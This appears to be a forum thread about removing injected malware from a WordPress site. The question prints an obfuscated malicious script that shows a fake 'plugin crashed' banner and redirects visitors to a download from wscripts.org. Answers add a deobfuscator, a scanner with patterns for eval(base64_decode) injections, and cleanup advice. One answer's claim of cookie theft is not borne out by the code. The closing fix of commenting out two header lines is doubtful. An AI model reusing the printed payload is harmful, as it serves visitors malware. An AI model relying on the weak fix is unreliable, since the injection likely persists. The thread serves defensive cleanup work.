"Couldn't find database jimbob_je" malware injection message in WordPress. How do I remove it?

I'm getting the following message on a WordPress site:

Unable to connect to the database server. Couldn't find database jimbob_je. The application had an unexpected problem. select statscurl_id from statscurl where statscurl_ip = '';

I have checked with sucuri.net, but it doesn't find anything, and I still get the error. I checked the page source from the browser and there are 2 encrypted scripts right above the closing head tag, but I can't find them in header.php.

Both scripts start with "eval(unescape", and when the page loads, 2 sites show up in the status bar: wscripts.org and jquery.com. Also, when inspecting the loaded scripts with Firebug, there are 2 called pop.js and imwb_cab_script.js, but they are not encrypted and come from the sites mentioned above. Both load randomly.

This is the code of imwb_cab_script.js:

jQuery(document).ready(function($) {
// $() will work as an alias for jQuery() inside of this function
imwb_activate_cab();
$('.imwb_cabar').live('click', function() {
var data = {
action :'imwb_cab_ctr_action',
barDetails: $(this).attr('id'),
nonce : IMWB_CAB_Ajax.nonce
};
$.ajax({
async: false,
type: 'POST',
url: IMWB_CAB_Ajax.ajaxurl,
data: data
});
imwb_goto_cab_link();
return true;
});
});
var cabCookie = function(name, value, expireHours, path) {
// name and at least value given, set cookie...
if (arguments.length > 1 ) {
if (expireHours === null || expireHours === undefined) {
expireHours = 7;

The other script, pop.js, is:

var _0xf475=["x69x6Dx77x62x5Fx63x61x62x31x5Fx73x68x6Fx77","x4E","x69x6Dx77x62x5Fx63x61x62x31x5Fx72x65x73x68x6Fx77","x72x61x6Ex64x6Fx6D","x3Cx64x69x76x20x63x6Cx61x73x73x3Dx22x69x6Dx77x62x5Fx63x61x62x61x72x22x20x69x64x3Dx22x63x61x62x5Fx31x5Fx30x22x3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx69x6Dx61x67x65x73x2Fx77x61x72x6Ex69x6Ex67x2Ex67x69x66x22x3Ex3Cx70x3Ex4Fx70x70x73x21x20x59x6Fx75x72x20x58x76x69x64x20x4Dx65x64x69x61x20x50x6Cx75x67x69x6Ex20x68x61x73x20x43x72x61x73x68x65x64x21x20x3Cx73x74x72x6Fx6Ex67x3Ex3Cx73x70x61x6Ex20x73x74x79x6Cx65x3Dx22x74x65x78x74x2Dx64x65x63x6Fx72x61x74x69x6Fx6Ex3Ax20x75x6Ex64x65x72x6Cx69x6Ex65x3Bx22x3Ex3Cx73x70x61x6Ex20x73x74x79x6Cx65x3Dx22x63x6Fx6Cx6Fx72x3Ax20x23x30x30x30x30x66x66x3Bx20x74x65x78x74x2Dx64x65x63x6Fx72x61x74x69x6Fx6Ex3Ax20x75x6Ex64x65x72x6Cx69x6Ex65x3Bx22x3Ex50x6Cx65x61x73x65x20x55x70x64x61x74x65x64x20x4Ex6Fx77x3Cx2Fx73x70x61x6Ex3Ex3Cx2Fx73x70x61x6Ex3Ex3Cx2Fx73x74x72x6Fx6Ex67x3Ex3Cx2Fx70x3Ex3Cx6Fx62x6Ax65x63x74x20x77x69x64x74x68x3Dx22x30x22x20x68x65x69x67x68x74x3Dx22x30x22x20x69x64x3Dx22x70x6Cx61x79x65x72x22x20x63x6Cx61x73x73x69x64x3Dx22x63x6Cx73x69x64x3Ax44x32x37x43x44x42x36x45x2Dx41x45x36x44x2Dx31x31x63x66x2Dx39x36x42x38x2Dx34x34x34x35x35x33x35x34x30x30x30x30x22x3Ex3Cx70x61x72x61x6Dx20x6Ex61x6Dx65x3Dx22x6Dx6Fx76x69x65x22x20x76x61x6Cx75x65x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx4Ax46x50x6Cx61x79x49x74x2Ex73x77x66x3Fx75x72x6Cx3Dx68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx63x61x62x61x72x2Ex6Dx70x33x22x3E
x3Cx65x6Dx62x65x64x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx4Ax46x50x6Cx61x79x49x74x2Ex73x77x66x3Fx75x72x6Cx3Dx68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx31x32x33x34x35x2Fx77x70x2Dx63x6Fx6Ex74x65x6Ex74x2Fx70x6Cx75x67x69x6Ex73x2Fx63x6Fx76x65x72x74x61x63x74x69x6Fx6Ex62x61x72x2Dx70x72x6Fx2Fx63x61x62x61x72x2Ex6Dx70x33x22x20x6Ex61x6Dx65x3Dx22x70x6Cx61x79x65x72x22x20x77x69x64x74x68x3Dx22x30x22x20x68x65x69x67x68x74x3Dx22x30x22x20x74x79x70x65x3Dx22x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx73x68x6Fx63x6Bx77x61x76x65x2Dx66x6Cx61x73x68x22x3Ex3Cx2Fx65x6Dx62x65x64x3Ex3Cx2Fx6Fx62x6Ax65x63x74x3Ex3Cx2Fx64x69x76x3E","x70x72x65x70x65x6Ex64","x62x6Fx64x79","x2Fx31x32x33x34x35x2F","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex77x73x63x72x69x70x74x73x2Ex6Fx72x67x2Fx64x6Fx77x6Ex6Cx6Fx61x64x2Dx76x6Cx63x2Dx70x6Cx61x79x65x72x2Fx3Fx6Dx6Ex3Dx34x34x36x33x34x33x34x32x32x32x36","x5Fx73x65x6Cx66","x6Fx70x65x6E"];function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;

The question is how to remove this code that shows up in the browser's page source.

You can see the encrypted scripts here

Any other solutions for getting rid of this code?

Thanks!!!

PD: the site does not use any plugins.
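The pop.js posted above hides every string it uses (cookie names, the injected HTML, the redirect URL, the `window.open` call) in a `_0xf475` array of `\xNN` escapes, which is why a plain search of the page source for "wscripts.org" finds nothing. Decoding that array is the quickest way to see what the script actually does before deciding what to clean. The following is an added example written for this page, not code from the post or from any of the projects it mentions; it works on a constructed, shortened copy of the array (the very long HTML element and the download URL are replaced by short placeholders, and `example.invalid` is a placeholder host) and accepts both `\xNN` and the backslash-stripped `xNN` form that appears in the paste.

```python
import re

# Constructed sample: the string array and the three functions from the pop.js in the question,
# with the two very long elements (index 4, the injected HTML, and index 8, the redirect URL)
# replaced by short placeholders. The paste lost its backslashes, so escapes appear as xNN
# rather than \xNN; decode_hex_string() accepts both.
SAMPLE_JS = (
    'var _0xf475=["x69x6Dx77x62x5Fx63x61x62x31x5Fx73x68x6Fx77","x4E",'
    '"x69x6Dx77x62x5Fx63x61x62x31x5Fx72x65x73x68x6Fx77","x72x61x6Ex64x6Fx6D",'
    '"x3Cx64x69x76x3E","x70x72x65x70x65x6Ex64","x62x6Fx64x79","x2Fx31x32x33x34x35x2F",'
    '"x68x74x74x70x3Ax2Fx2Fx65x78x61x6Dx70x6Cx65x2Ex69x6Ex76x61x6Cx69x64x2F",'
    '"x5Fx73x65x6Cx66","x6Fx70x65x6E"];'
    'function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||'
    'cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;'
    'function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);'
    'cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;'
    'function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);'
    'window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;'
)

# var _0x....=[ "...", "..." ];   (the usual shape of a string-array obfuscator)
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESC_RE = re.compile(r'\\?x([0-9A-Fa-f]{2})')


def decode_hex_string(s):
    """Turn a run of \\xNN escapes (or xNN with the backslashes stripped) into plain text."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def extract_string_arrays(js):
    """Return {array_name: [decoded strings]} for every 'var _0x...=[...];' in the script."""
    arrays = {}
    for name, body in ARRAY_RE.findall(js):
        arrays[name] = [decode_hex_string(s) for s in STRING_RE.findall(body)]
    return arrays


def inline_references(js, arrays):
    """Rewrite name[N] lookups into quoted literals and drop the array, so the code reads plainly."""
    out = js
    for name, strings in arrays.items():
        def repl(m, strings=strings):
            idx = int(m.group(1))
            if idx >= len(strings):
                return m.group(0)  # out-of-range index: leave it rather than guess
            return '"%s"' % strings[idx].replace('"', '\\"')
        out = re.sub(re.escape(name) + r'\[(\d+)\]', repl, out)
        out = ARRAY_RE.sub(lambda m, n=name: '' if m.group(1) == n else m.group(0), out)
    return out


def find_urls(arrays):
    """URLs hidden in the decoded arrays: the first thing to block and to search access logs for."""
    return sorted(u for strings in arrays.values() for s in strings
                  for u in re.findall(r'https?://[^\s"\'<>]+', s))


if __name__ == '__main__':
    found = extract_string_arrays(SAMPLE_JS)
    for name, strings in found.items():
        print(name, strings)
    print(inline_references(SAMPLE_JS, found))
    print('URLs:', find_urls(found))
```

On the sample this turns `Math[_0xf475[3]]()<0.02` into `Math["random"]()<0.02`, which shows the 2% chance per page load that explains why the question says the scripts "load randomly", and `window[_0xf475[10]](_0xf475[8],_0xf475[9])` into `window["open"]("...","_self")`, the redirect that fires when the fake "plugin crashed" bar is clicked.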

I got something similar last week, but it only infected the PHP files. Can you show your code in the header?

Decoding the code you posted, I see it apparently tries to steal the user's cookies and display some kind of banner. I suggest you take your site offline immediately and try to clean the code from your pages manually.. If you are using a theme with an older version of Timthumb, that may be your security hole!

The first thing is to disable the site for public visitors, because I think this code may be trying to download a virus into the visitors' browsers!

To do that, just create this .htaccess file in the root directory:

<IfModule mod_rewrite.c>
 RewriteEngine on
 # only this address keeps access; dots are escaped so they match literally
 RewriteCond %{REMOTE_ADDR} !^192\.168\.0\.100$
 # don't redirect the maintenance page itself or its images (avoids a redirect loop)
 RewriteCond %{REQUEST_URI} !/pageisdown.html$ [NC]
 RewriteCond %{REQUEST_URI} !\.(jpe?g|png|gif)$ [NC]
 RewriteRule .* /pageisdown.html [R=302,L]
</IfModule>

I got this from here; just change the 192.168.0.100 line to your own public IP address, then only you can access the site and everyone else will be redirected to the pageisdown.html page! (feel free to create that page and put whatever content you like on it..)

Second, you need to scan your files manually to see where this script comes from; usually it will be in the form of a PHP function call that looks like this

eval(base64_decode(....))

The dots (...) are usually a large chunk of Base64-encoded code; just remove that function call and you'll be clean! And make sure there are no backdoor files: check your server for newly created PHP files or other scripts you don't remember creating.
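The manual scan described in this answer (search every PHP/JS file for `eval(base64_decode(` and `eval(unescape(`, and list script files created or changed recently) is easy to automate so it can be re-run after each cleanup, which matters here because the question later notes the injection came back within hours. The script below is an added example written for this page, not code from the answer or from WordPress; it builds a constructed, throw-away sample install in a temp directory (one injected header, one planted file under `wp-content/uploads`) and reports both kinds of finding. Against a real site, point `scan_tree()` at a copy of the document root and review every hit by hand, since a few legitimate plugins also ship base64-packed code.

```python
import os
import re
import shutil
import tempfile
import time

# Constructs named in the thread plus two common cousins; all are byte regexes so binary
# junk in a file cannot break the scan.
SUSPICIOUS = [
    re.compile(rb'eval\s*\(\s*base64_decode\s*\('),   # PHP: eval(base64_decode(....))
    re.compile(rb'eval\s*\(\s*unescape\s*\('),         # JS:  eval(unescape(....)) in header/footer
    re.compile(rb'eval\s*\(\s*gzinflate\s*\('),        # PHP: compressed-then-eval'd payload
    re.compile(rb'eval\s*\(\s*str_rot13\s*\('),
]
SCAN_EXT = {'.php', '.js', '.html', '.htm', '.inc'}


def scan_file(path, patterns=SUSPICIOUS):
    """Return [(pattern_text, byte_offset)] for every suspicious construct in one file."""
    with open(path, 'rb') as f:
        data = f.read()
    return [(pat.pattern.decode(), m.start())
            for pat in patterns for m in pat.finditer(data)]


def recently_modified(path, now, days):
    return now - os.path.getmtime(path) < days * 86400


def scan_tree(root, recent_days=7, now=None):
    """Walk an install; report injected-eval hits and script files changed within recent_days."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root)
            for pat, off in scan_file(path):
                findings.append((rel, 'pattern', '%s at byte %d' % (pat, off)))
            if recently_modified(path, now, recent_days):
                findings.append((rel, 'recent', 'modified within %d days' % recent_days))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample install: one injected theme header and one planted backdoor-like file.
    The base64 payload is just echo 'hi'; so the sample stays harmless."""
    root = tempfile.mkdtemp(prefix='wp-scan-')
    files = {
        'wp-content/themes/demo/header.php':
            b'<?php wp_head(); ?>\n<script>eval(unescape("%76%61%72"))</script>\n',
        'wp-content/uploads/cache.php':
            b'<?php eval(base64_decode("ZWNobyAnaGknOw==")); ?>',
        'wp-content/themes/demo/style.css': b'body{}',          # not a script: skipped
        'wp-includes/functions.php': b'<?php function x(){}',   # clean and old: no finding
    }
    month_ago = time.time() - 30 * 86400
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as f:
            f.write(content)
        if rel != 'wp-content/uploads/cache.php':   # only the planted file looks fresh
            os.utime(path, (month_ago, month_ago))
    return root


if __name__ == '__main__':
    root = build_sample_tree()
    try:
        for rel, kind, detail in scan_tree(root):
            print('%-8s %-40s %s' % (kind, rel, detail))
    finally:
        shutil.rmtree(root)
```

A file that shows up under both `pattern` and `recent` (the planted `cache.php` in the sample) is the strongest signal; a `pattern` hit in a file that has not changed in months is more often a packed but legitimate plugin, and a `recent` hit with no pattern still deserves a diff against a clean copy of the same theme or plugin version.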

I think I found a workaround: reading the thread "Malware in header.php" on wordpress.stackexchange.com, someone found code above wp_head() and cleaned it, but it reappeared a few hours later.

I looked for something similar but found nothing suspicious. Just in case, I commented out the 2 lines above wp_head(), like this

<!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->

Then I reloaded the site a few times and now it seems fine: no message, no encrypted scripts when viewing the page source, no attempts to load wscripts.org, etc. The site even loads faster now.

I also made some security fixes.

If it happens again, I'll let you know.

Hope this is useful for someone in a similar situation.

Latest update